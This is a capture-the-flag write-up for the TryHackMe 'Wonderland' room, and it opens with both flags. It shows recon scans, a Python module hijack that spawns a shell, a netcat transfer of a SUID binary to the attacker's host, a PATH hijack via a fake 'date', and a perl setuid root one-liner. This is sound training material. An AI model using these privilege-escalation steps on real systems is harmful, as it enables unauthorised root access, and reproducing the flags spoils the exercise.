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827 lines (761 loc) · 31 KB

File metadata and controls

827 lines (761 loc) · 31 KB


Answer the questions below

Ques 1. Obtain the flag in user.txt

thm{"Curiouser and curiouser!"}

Ques 2. Escalate your privileges, what is the flag in root.txt?

thm{Twinkle, twinkle, little bat! How I wonder what you’re at!}

1. Let's Get Started

Let make a Nmap Scan

└─$ nmap -sV -sC                 
Starting Nmap 7.94SVN ( ) at 2024-04-05 21:28 IST
Nmap scan report for
Host is up (0.17s latency).
Not shown: 998 closed tcp ports (conn-refused)
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
|   256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_  256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

2. As Http is open let make a dirctory search

Im using dirsearch bez it easy to use

└─$ dirsearch -u                     
/usr/lib/python3/dist-packages/dirsearch/ DeprecationWarning: pkg_resources is deprecated as an API. See
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/death/Lab-CTF/wonder/reports/_10.10.159.138/_24-04-05_21-34-11.txt


[21:34:11] Starting: 
[21:34:13] 301 -    0B  - /%2e%2e//  ->  /
[21:34:13] 301 -    0B  - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd  ->  /etc/passwd
[21:34:32] 301 -    0B  - /adm/index.html  ->  ./
[21:34:34] 301 -    0B  - /admin/index.html  ->  ./
[21:34:35] 301 -    0B  - /admin2/index.html  ->  ./
[21:34:36] 301 -    0B  - /admin_area/index.html  ->  ./
[21:34:41] 301 -    0B  - /adminarea/index.html  ->  ./
[21:34:41] 301 -    0B  - /admincp/index.html  ->  ./
[21:34:43] 301 -    0B  - /administrator/index.html  ->  ./
[21:34:46] 301 -    0B  - /api/index.html  ->  ./
[21:34:47] 301 -    0B  - /api/swagger/static/index.html  ->  ./
[21:34:47] 301 -    0B  - /api/swagger/index.html  ->  ./
[21:34:49] 301 -    0B  - /axis//happyaxis.jsp  ->  /axis/happyaxis.jsp
[21:34:49] 301 -    0B  - /axis2//axis2-web/HappyAxis.jsp  ->  /axis2/axis2-web/HappyAxis.jsp
[21:34:49] 301 -    0B  - /axis2-web//HappyAxis.jsp  ->  /axis2-web/HappyAxis.jsp
[21:34:50] 301 -    0B  - /bb-admin/index.html  ->  ./
[21:34:53] 301 -    0B  - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd  ->  /etc/passwd
[21:34:53] 301 -    0B  - /cgi-bin/index.html  ->  ./
[21:34:54] 301 -    0B  - /Citrix//AccessPlatform/auth/clientscripts/cookies.js  ->  /Citrix/AccessPlatform/auth/clientscripts/cookies.js
[21:34:58] 301 -    0B  - /core/latest/swagger-ui/index.html  ->  ./
[21:35:00] 301 -    0B  - /demo/ejb/index.html  ->  ./
[21:35:01] 301 -    0B  - /doc/html/index.html  ->  ./
[21:35:01] 301 -    0B  - /docs/html/admin/index.html  ->  ./
[21:35:01] 301 -    0B  - /docs/html/index.html  ->  ./
[21:35:02] 301 -    0B  - /druid/index.html  ->  ./
[21:35:03] 301 -    0B  - /engine/classes/swfupload//swfupload_f9.swf  ->  /engine/classes/swfupload/swfupload_f9.swf
[21:35:03] 301 -    0B  - /engine/classes/swfupload//swfupload.swf  ->  /engine/classes/swfupload/swfupload.swf
[21:35:04] 301 -    0B  - /estore/index.html  ->  ./
[21:35:04] 301 -    0B  - /examples/jsp/index.html  ->  ./
[21:35:04] 301 -    0B  - /examples/servlets/index.html  ->  ./
[21:35:05] 301 -    0B  - /extjs/resources//charts.swf  ->  /extjs/resources/charts.swf
[21:35:09] 301 -    0B  - /html/js/misc/swfupload//swfupload.swf  ->  /html/js/misc/swfupload/swfupload.swf
[21:35:10] 301 -    0B  - /img  ->  img/
[21:35:11] 301 -    0B  - /index.html  ->  ./
[21:35:17] 301 -    0B  - /logon/LogonPoint/index.html  ->  ./
[21:35:18] 301 -    0B  - /manual/index.html  ->  ./
[21:35:20] 301 -    0B  - /mifs/user/index.html  ->  ./
[21:35:20] 301 -    0B  - /modelsearch/index.html  ->  ./
[21:35:25] 301 -    0B  - /panel-administracion/index.html  ->  ./
[21:35:28] 301 -    0B  - /phpmyadmin/docs/html/index.html  ->  ./
[21:35:28] 301 -    0B  - /phpmyadmin/doc/html/index.html  ->  ./
[21:35:31] 301 -    0B  - /prod-api/druid/index.html  ->  ./
[21:35:32] 301 -    0B  - /r  ->  r/
[21:35:38] 301 -    0B  - /siteadmin/index.html  ->  ./
[21:35:41] 301 -    0B  - /stzx_admin/index.html  ->  ./
[21:35:42] 301 -    0B  - /swagger/index.html  ->  ./
[21:35:43] 301 -    0B  - /templates/index.html  ->  ./
[21:35:44] 301 -    0B  - /tiny_mce/plugins/imagemanager/pages/im/index.html  ->  ./
[21:35:49] 301 -    0B  - /vpn/index.html  ->  ./
[21:35:51] 301 -    0B  - /webadmin/index.html  ->  ./
[21:35:52] 301 -    0B  - /webdav/index.html  ->  ./

Task Completed

Got a lot of page but let visite ip first

Screenshot from 2024-04-05 21-38-29

I manually check admin and index but nothing i got let check /r it look intreasting

Ohh i got something

Screenshot from 2024-04-05 22-36-52

So let make again dirSearch

└─$ dirsearch -u
/usr/lib/python3/dist-packages/dirsearch/ DeprecationWarning: pkg_resources is deprecated as an API. See
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/death/Lab-CTF/wonder/reports/_10.10.159.138/_r_24-04-05_22-38-23.txt


[22:38:23] Starting: r/
[22:38:27] 301 -    0B  - /r/%2e%2e//  ->  /
[22:38:27] 301 -    0B  - /r/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd  ->  /etc/passwd
[22:38:41] 301 -    0B  - /r/a  ->  a/
[22:38:44] 301 -    0B  - /r/adm/index.html  ->  ./
[22:38:46] 301 -    0B  - /r/admin/index.html  ->  ./
[22:38:48] 301 -    0B  - /r/admin2/index.html  ->  ./
[22:38:48] 301 -    0B  - /r/admin_area/index.html  ->  ./
[22:38:53] 301 -    0B  - /r/adminarea/index.html  ->  ./
[22:38:54] 301 -    0B  - /r/admincp/index.html  ->  ./
[22:38:55] 301 -    0B  - /r/administrator/index.html  ->  ./
[22:38:58] 301 -    0B  - /r/api/index.html  ->  ./
[22:38:59] 301 -    0B  - /r/api/swagger/index.html  ->  ./
[22:38:59] 301 -    0B  - /r/api/swagger/static/index.html  ->  ./
[22:39:01] 301 -    0B  - /r/axis//happyaxis.jsp  ->  /r/axis/happyaxis.jsp
[22:39:01] 301 -    0B  - /r/axis2-web//HappyAxis.jsp  ->  /r/axis2-web/HappyAxis.jsp
[22:39:01] 301 -    0B  - /r/axis2//axis2-web/HappyAxis.jsp  ->  /r/axis2/axis2-web/HappyAxis.jsp
[22:39:02] 301 -    0B  - /r/bb-admin/index.html  ->  ./
[22:39:05] 301 -    0B  - /r/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd  ->  /etc/passwd
[22:39:05] 301 -    0B  - /r/cgi-bin/index.html  ->  ./
[22:39:06] 301 -    0B  - /r/Citrix//AccessPlatform/auth/clientscripts/cookies.js  ->  /r/Citrix/AccessPlatform/auth/clientscripts/cookies.js
[22:39:09] 301 -    0B  - /r/core/latest/swagger-ui/index.html  ->  ./
[22:39:12] 301 -    0B  - /r/demo/ejb/index.html  ->  ./
[22:39:13] 301 -    0B  - /r/doc/html/index.html  ->  ./
[22:39:13] 301 -    0B  - /r/docs/html/admin/index.html  ->  ./
[22:39:13] 301 -    0B  - /r/docs/html/index.html  ->  ./
[22:39:14] 301 -    0B  - /r/druid/index.html  ->  ./
[22:39:15] 301 -    0B  - /r/engine/classes/swfupload//swfupload.swf  ->  /r/engine/classes/swfupload/swfupload.swf
[22:39:15] 301 -    0B  - /r/engine/classes/swfupload//swfupload_f9.swf  ->  /r/engine/classes/swfupload/swfupload_f9.swf
[22:39:16] 301 -    0B  - /r/estore/index.html  ->  ./
[22:39:16] 301 -    0B  - /r/examples/servlets/index.html  ->  ./
[22:39:16] 301 -    0B  - /r/examples/jsp/index.html  ->  ./
[22:39:16] 301 -    0B  - /r/extjs/resources//charts.swf  ->  /r/extjs/resources/charts.swf
[22:39:21] 301 -    0B  - /r/html/js/misc/swfupload//swfupload.swf  ->  /r/html/js/misc/swfupload/swfupload.swf
[22:39:23] 301 -    0B  - /r/index.html  ->  ./
[22:39:28] 301 -    0B  - /r/logon/LogonPoint/index.html  ->  ./
[22:39:30] 301 -    0B  - /r/manual/index.html  ->  ./
[22:39:32] 301 -    0B  - /r/mifs/user/index.html  ->  ./
[22:39:32] 301 -    0B  - /r/modelsearch/index.html  ->  ./
[22:39:37] 301 -    0B  - /r/panel-administracion/index.html  ->  ./
[22:39:40] 301 -    0B  - /r/phpmyadmin/doc/html/index.html  ->  ./
[22:39:40] 301 -    0B  - /r/phpmyadmin/docs/html/index.html  ->  ./
[22:39:43] 301 -    0B  - /r/prod-api/druid/index.html  ->  ./
[22:39:50] 301 -    0B  - /r/siteadmin/index.html  ->  ./
[22:39:53] 301 -    0B  - /r/stzx_admin/index.html  ->  ./
[22:39:54] 301 -    0B  - /r/swagger/index.html  ->  ./
[22:39:56] 301 -    0B  - /r/templates/index.html  ->  ./
[22:39:57] 301 -    0B  - /r/tiny_mce/plugins/imagemanager/pages/im/index.html  ->  ./
[22:40:02] 301 -    0B  - /r/vpn/index.html  ->  ./
[22:40:04] 301 -    0B  - /r/webadmin/index.html  ->  ./
[22:40:04] 301 -    0B  - /r/webdav/index.html  ->  ./

Task Completed

Got /a

Screenshot from 2024-04-05 22-45-26

Again so many but specific one is /a

Let make again dirSearch at /a

└─$ dirsearch -u
└─$ dirsearch -u
/usr/lib/python3/dist-packages/dirsearch/ DeprecationWarning: pkg_resources is deprecated as an API. See
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/death/Lab-CTF/wonder/reports/_10.10.159.138/_r_a_24-04-05_22-42-56.txt


[22:42:56] Starting: r/a/
[22:42:59] 301 -    0B  - /r/a/%2e%2e//  ->  /r/
[22:42:59] 301 -    0B  - /r/a/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd  ->  /etc/passwd
[22:43:17] 301 -    0B  - /r/a/adm/index.html  ->  ./
[22:43:19] 301 -    0B  - /r/a/admin/index.html  ->  ./
[22:43:20] 301 -    0B  - /r/a/admin2/index.html  ->  ./
[22:43:21] 301 -    0B  - /r/a/admin_area/index.html  ->  ./
[22:43:26] 301 -    0B  - /r/a/adminarea/index.html  ->  ./
[22:43:26] 301 -    0B  - /r/a/admincp/index.html  ->  ./
[22:43:28] 301 -    0B  - /r/a/administrator/index.html  ->  ./
[22:43:31] 301 -    0B  - /r/a/api/index.html  ->  ./
[22:43:31] 301 -    0B  - /r/a/api/swagger/static/index.html  ->  ./
[22:43:31] 301 -    0B  - /r/a/api/swagger/index.html  ->  ./
[22:43:34] 301 -    0B  - /r/a/axis2-web//HappyAxis.jsp  ->  /r/a/axis2-web/HappyAxis.jsp
[22:43:34] 301 -    0B  - /r/a/axis//happyaxis.jsp  ->  /r/a/axis/happyaxis.jsp
[22:43:34] 301 -    0B  - /r/a/axis2//axis2-web/HappyAxis.jsp  ->  /r/a/axis2/axis2-web/HappyAxis.jsp
[22:43:34] 301 -    0B  - /r/a/b  ->  b/
[22:43:35] 301 -    0B  - /r/a/bb-admin/index.html  ->  ./
[22:43:38] 301 -    0B  - /r/a/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd  ->  /etc/passwd
[22:43:38] 301 -    0B  - /r/a/cgi-bin/index.html  ->  ./
[22:43:39] 301 -    0B  - /r/a/Citrix//AccessPlatform/auth/clientscripts/cookies.js  ->  /r/a/Citrix/AccessPlatform/auth/clientscripts/cookies.js
[22:43:43] 301 -    0B  - /r/a/core/latest/swagger-ui/index.html  ->  ./
[22:43:45] 301 -    0B  - /r/a/demo/ejb/index.html  ->  ./
[22:43:46] 301 -    0B  - /r/a/doc/html/index.html  ->  ./
[22:43:46] 301 -    0B  - /r/a/docs/html/index.html  ->  ./
[22:43:46] 301 -    0B  - /r/a/docs/html/admin/index.html  ->  ./
[22:43:47] 301 -    0B  - /r/a/druid/index.html  ->  ./
[22:43:48] 301 -    0B  - /r/a/engine/classes/swfupload//swfupload.swf  ->  /r/a/engine/classes/swfupload/swfupload.swf
[22:43:48] 301 -    0B  - /r/a/engine/classes/swfupload//swfupload_f9.swf  ->  /r/a/engine/classes/swfupload/swfupload_f9.swf
[22:43:48] 301 -    0B  - /r/a/estore/index.html  ->  ./
[22:43:49] 301 -    0B  - /r/a/examples/jsp/index.html  ->  ./
[22:43:49] 301 -    0B  - /r/a/examples/servlets/index.html  ->  ./
[22:43:49] 301 -    0B  - /r/a/extjs/resources//charts.swf  ->  /r/a/extjs/resources/charts.swf
[22:43:54] 301 -    0B  - /r/a/html/js/misc/swfupload//swfupload.swf  ->  /r/a/html/js/misc/swfupload/swfupload.swf
[22:43:56] 301 -    0B  - /r/a/index.html  ->  ./
[22:44:02] 301 -    0B  - /r/a/logon/LogonPoint/index.html  ->  ./
[22:44:03] 301 -    0B  - /r/a/manual/index.html  ->  ./
[22:44:05] 301 -    0B  - /r/a/mifs/user/index.html  ->  ./
[22:44:05] 301 -    0B  - /r/a/modelsearch/index.html  ->  ./
[22:44:09] 301 -    0B  - /r/a/panel-administracion/index.html  ->  ./
CTRL+C detected: Pausing threads, please wait...
[q]uit / [c]ontinue: q
[s]ave / [q]uit without saving: q

Canceled by the user

Ok so i got /b so i dont need to dig more


So Things making sence rabbit let try Directly

Screenshot from 2024-04-05 22-50-26

Let check code

Screenshot from 2024-04-05 22-54-12

3. SSH Time

We got username alice and password


Let enter !!

└─$ ssh alice@
The authenticity of host ' (' can't be established.
ED25519 key fingerprint is SHA256:Q8PPqQyrfXMAZkq45693yD4CmWAYp5GOINbxYqTRedo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '' (ED25519) to the list of known hosts.
alice@'s password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64)

 * Documentation:
 * Management:
 * Support:

  System information as of Fri Apr  5 17:27:31 UTC 2024

  System load:  0.0                Processes:           84
  Usage of /:   18.9% of 19.56GB   Users logged in:     0
  Memory usage: 29%                IP address for eth0:
  Swap usage:   0%

0 packages can be updated.
0 updates are security updates.

Last login: Mon May 25 16:37:21 2020 from

Ok let manually enumerate

alice@wonderland:~$ ls -la
total 40
drwxr-xr-x 5 alice alice 4096 May 25  2020 .
drwxr-xr-x 6 root  root  4096 May 25  2020 ..
lrwxrwxrwx 1 root  root     9 May 25  2020 .bash_history -> /dev/null
-rw-r--r-- 1 alice alice  220 May 25  2020 .bash_logout
-rw-r--r-- 1 alice alice 3771 May 25  2020 .bashrc
drwx------ 2 alice alice 4096 May 25  2020 .cache
drwx------ 3 alice alice 4096 May 25  2020 .gnupg
drwxrwxr-x 3 alice alice 4096 May 25  2020 .local
-rw-r--r-- 1 alice alice  807 May 25  2020 .profile
-rw------- 1 root  root    66 May 25  2020 root.txt
-rw-r--r-- 1 root  root  3577 May 25  2020
alice@wonderland:~$ cd /home
alice@wonderland:/home$ ls
alice  hatter  rabbit  tryhackme

So we got some user and a python file

Let see content of python file

As i remember There is a hint for user.txt in the Wonderland room Everything is upside down here as root.txt in alice so maybe user.txt is in root

alice@wonderland:/home$ cd /
alice@wonderland:/$ ls
bin  boot  cdrom  dev  etc  home  initrd.img  initrd.img.old  lib  lib64  lost+found  media  mnt  opt  proc  root  run  sbin  srv  swap.img  sys  tmp  usr  var  vmlinuz  vmlinuz.old
alice@wonderland:/$ cd root/
alice@wonderland:/root$ ls
ls: cannot open directory '.': Permission denied
alice@wonderland:/root$ ls -la
ls: cannot open directory '.': Permission denied
alice@wonderland:/root$ cd /root
alice@wonderland:/root$ ls 
ls: cannot open directory '.': Permission denied

So try directly , Ohh we got flag !!

alice@wonderland:/home$ cat /root/user.txt
thm{"Curiouser and curiouser!"}

4. Try to find more clues to Privilege Escalation

alice@wonderland:/root$ sudo -l
[sudo] password for alice: 
Sorry, try again.
[sudo] password for alice: 
Matching Defaults entries for alice on wonderland:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alice may run the following commands on wonderland:
    (rabbit) /usr/bin/python3.6 /home/alice/

So Let see content of python file

alice@wonderland:/home$ cd alice
alice@wonderland:~$ cat 
import random
poem = """The sun was shining on the sea,
Shining with all his might:
He did his very best to make
The billows smooth and bright —
And this was odd, because it was
The middle of the night.

The moon was shining sulkily,
Because she thought the sun
Had got no business to be there
After the day was done —
"It’s very rude of him," she said,
"To come and spoil the fun!"

The sea was wet as wet could be,
The sands were dry as dry.
You could not see a cloud, because
No cloud was in the sky:
No birds were flying over head —
There were no birds to fly.

The Walrus and the Carpenter
Were walking close at hand;
They wept like anything to see
Such quantities of sand:
"If this were only cleared away,"
They said, "it would be grand!"

"If seven maids with seven mops
Swept it for half a year,
Do you suppose," the Walrus said,
"That they could get it clear?"
"I doubt it," said the Carpenter,
And shed a bitter tear.

"O Oysters, come and walk with us!"
The Walrus did beseech.
"A pleasant walk, a pleasant talk,
Along the briny beach:
We cannot do with more than four,
To give a hand to each."

The eldest Oyster looked at him.
But never a word he said:
The eldest Oyster winked his eye,
And shook his heavy head —
Meaning to say he did not choose
To leave the oyster-bed.

But four young oysters hurried up,
All eager for the treat:
there coats were brushed, there faces washed,
there shoes were clean and neat —
And this was odd, because, you know,
They hadn’t any feet.

Four other Oysters followed them,
And yet another four;
And thick and fast they came at last,
And more, and more, and more —
All hopping through the frothy waves,
And scrambling to the shore.

The Walrus and the Carpenter
Walked on a mile or so,
And then they rested on a rock
Conveniently low:
And all the little Oysters stood
And waited in a row.

"The time has come," the Walrus said,
"To talk of many things:
Of shoes — and ships — and sealing-wax —
Of cabbages — and kings —
And why the sea is boiling hot —
And whether pigs have wings."

"But wait a bit," the Oysters cried,
"Before we have our chat;
For some of us are out of breath,
And all of us are fat!"
"No hurry!" said the Carpenter.
They thanked him much for that.

"A loaf of bread," the Walrus said,
"Is what we chiefly need:
Pepper and vinegar besides
Are very good indeed —
Now if you’re ready Oysters dear,
We can begin to feed."

"But not on us!" the Oysters cried,
Turning a little blue,
"After such kindness, that would be
A dismal thing to do!"
"The night is fine," the Walrus said
"Do you admire the view?

"It was so kind of you to come!
And you are very nice!"
The Carpenter said nothing but
"Cut us another slice:
I wish you were not quite so deaf —
I’ve had to ask you twice!"

"It seems a shame," the Walrus said,
"To play them such a trick,
After we’ve brought them out so far,
And made them trot so quick!"
The Carpenter said nothing but
"The butter’s spread too thick!"

"I weep for you," the Walrus said.
"I deeply sympathize."
With sobs and tears he sorted out
Those of the largest size.
Holding his pocket handkerchief
Before his streaming eyes.

"O Oysters," said the Carpenter.
"You’ve had a pleasant run!
Shall we be trotting home again?"
But answer came there none —
And that was scarcely odd, because
They’d eaten every one."""

for i in range(10):
    line = random.choice(poem.split("\n"))
    print("The line was:\t", line)alice@wonderland:~$ 

Intreasting Import random on first line look like we got our way

Let check path to double confirm

python3 -c 'import sys; print (sys.path)'
alice@wonderland:~$ python3 -c 'import sys; print (sys.path)'
['', '/usr/lib/', '/usr/lib/python3.6', '/usr/lib/python3.6/lib-dynload', '/usr/local/lib/python3.6/dist-packages', '/usr/lib/python3/dist-packages']

Ok We have python library , but let check if there is any cron job

  alice@wonderland:~$ crontab -l
no crontab for alice
alice@wonderland:~$ ps
  PID TTY          TIME CMD
 1256 pts/0    00:00:00 bash
 1388 pts/0    00:00:00 ps


So Let check sudor.d file

alice@wonderland:~$ cat /etc/sudoers.d/alice 
alice ALL = (rabbit) /usr/bin/python3.6 /home/alice/

So Rabbit have permission to run python file

Ok so let make a fake python random module with same name to fill it with malicious code and run

5. Access rabbit using Python script

I'm Writing a testing program just for try

alice@wonderland:~$ echo ""import os"
> os.system("/bin/bash")" >
alice@wonderland:~$ cat 
import os

Let try to run probably it will run as i think of !!

alice@wonderland:~$ sudo -l
Matching Defaults entries for alice on wonderland:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alice may run the following commands on wonderland:
    (rabbit) /usr/bin/python3.6 /home/alice/
alice@wonderland:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/

wow I got this

So let manually enum this

rabbit@wonderland:~$ pwd
rabbit@wonderland:~$ cd /home/rabbit
rabbit@wonderland:/home/rabbit$ ls -la
total 40
drwxr-x--- 2 rabbit rabbit  4096 May 25  2020 .
drwxr-xr-x 6 root   root    4096 May 25  2020 ..
lrwxrwxrwx 1 root   root       9 May 25  2020 .bash_history -> /dev/null
-rw-r--r-- 1 rabbit rabbit   220 May 25  2020 .bash_logout
-rw-r--r-- 1 rabbit rabbit  3771 May 25  2020 .bashrc
-rw-r--r-- 1 rabbit rabbit   807 May 25  2020 .profile
-rwsr-sr-x 1 root   root   16816 May 25  2020 teaParty

I found something suspicious teaParty is in red colour

Ok try to execute and read content but it not doing anything.

rabbit@wonderland:/home/rabbit$ ./teaParty 
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by Fri, 05 Apr 2024 19:27:36 +0000
Ask very nicely, and I will give you some tea while you wait for him
Segmentation fault (core dumped)
rabbit@wonderland:/home/rabbit$ nano teaParty 
Unable to create directory /home/alice/.local/share/nano/: Permission denied
It is required for saving/loading search history or cursor positions.

Press Enter to continue


Let ltrace it

rabbit@wonderland:/home/rabbit$ ltrace ./teaParty 
setuid(1003)                                                                                                                                       = -1
setgid(1003)                                                                                                                                       = -1
puts("Welcome to the tea party!\nThe Ma"...Welcome to the tea party!
The Mad Hatter will be here soon.
)                                                                                                       = 60
system("/bin/echo -n 'Probably by ' && d"...Probably by Fri, 05 Apr 2024 19:32:17 +0000
 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                                                                                             = 0
puts("Ask very nicely, and I will give"...Ask very nicely, and I will give you some tea while you wait for him
)                                                                                                        = 69
getchar(1, 0x559459346260, 0x7ff7565ae8c0, 0x7ff7562d11542
)                                                                                         = 50
puts("Segmentation fault (core dumped)"...Segmentation fault (core dumped)
)                                                                                                        = 33
+++ exited (status 33) +++

OK it's made up fault of segmentation

Let check strings

rabbit@wonderland:/home/rabbit$ strings teaParty 

Command 'strings' not found, but can be installed with:

apt install binutils
Please ask your administrator.


ohh i can't do it in rabit, let transfer it to my system using netcat

Open listener and direct content to a txt file

└─$ nc -lvnp 4444 > teaparty
listening on [any] 4444 ...

In rabbit Transfer teaParty file

rabbit@wonderland:/home/rabbit$ nc 4444 < teaParty

Suspend connection

└─$ nc -lvnp 4444 > teaparty
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 59842

Let check strings

└─$ strings teaparty
Welcome to the tea party!
The Mad Hatter will be here soon.
/bin/echo -n 'Probably by ' && date --date='next hour' -R
Ask very nicely, and I will give you some tea while you wait for him
Segmentation fault (core dumped)
GCC: (Debian 8.3.0-6) 8.3.0

6. Let Try to modify date

As i think date have directly so try to modify it

Let check path

echo "$PATH"

Ok let try to make a file with date

rabbit@wonderland:/home/rabbit$ nano date 
Unable to create directory /home/alice/.local/share/nano/: Permission denied
It is required for saving/loading search history or cursor positions.

Press Enter to continue

Add few lines to get new bash session

Screenshot from 2024-04-06 00-51-54

Let give permission and run this

rabbit@wonderland:/home/rabbit$ chmod +x date 
rabbit@wonderland:/home/rabbit$ ./date

Let check the shell level to get an idea of success

rabbit@wonderland:/home/rabbit$ echo "$SHLVL"

okay we got differ session

7. Let add this to path

rabbit@wonderland:/home/rabbit$ export PATH=/home/rabbit:$PATH

It is gonna use prefex of that binary so We successfully make a fake date command that give use other user , before reaching to real date command

Let run teaParty again

rabbit@wonderland:/home/rabbit$ ./teaParty 
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$ 

Ok i got hatter

Probably by hatter@wonderland:/home/rabbit$ cd /home/hatter/
hatter@wonderland:/home/hatter$ ls -la
total 28
drwxr-x--- 3 hatter hatter 4096 May 25  2020 .
drwxr-xr-x 6 root   root   4096 May 25  2020 ..
lrwxrwxrwx 1 root   root      9 May 25  2020 .bash_history -> /dev/null
-rw-r--r-- 1 hatter hatter  220 May 25  2020 .bash_logout
-rw-r--r-- 1 hatter hatter 3771 May 25  2020 .bashrc
drwxrwxr-x 3 hatter hatter 4096 May 25  2020 .local
-rw-r--r-- 1 hatter hatter  807 May 25  2020 .profile
-rw------- 1 hatter hatter   29 May 25  2020 password.txt

I got a file password.txt maybe it for hatter

hatter@wonderland:/home/hatter$ cat password.txt 
hatter@wonderland:/home/hatter$ su hatter 
hatter@wonderland:~$ whoami

I dont think it make any difference

Let find suid file

find / -user root -perm /4000 2>/dev/null

I dont get any useful files

Let try again

getcap -r / 2>/dev/null

I got perl Capabilities here with suid

alice@wonderland:~$ getcap -r / 2>/dev/null 
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep

8. Let Get Root

Let search on gtfobin for perl Capabilities

Screenshot from 2024-04-06 01-43-55

So let run this

I just modify last line of sh to bash perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'
hatter@wonderland:~$ whoami
hatter@wonderland:~$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'

Boom !!

root@wonderland:~# ls  password.txt
root@wonderland:~# cd /home/alice/
root@wonderland:/home/alice# cat root.txt 
thm{Twinkle, twinkle, little bat! How I wonder what you’re at!}
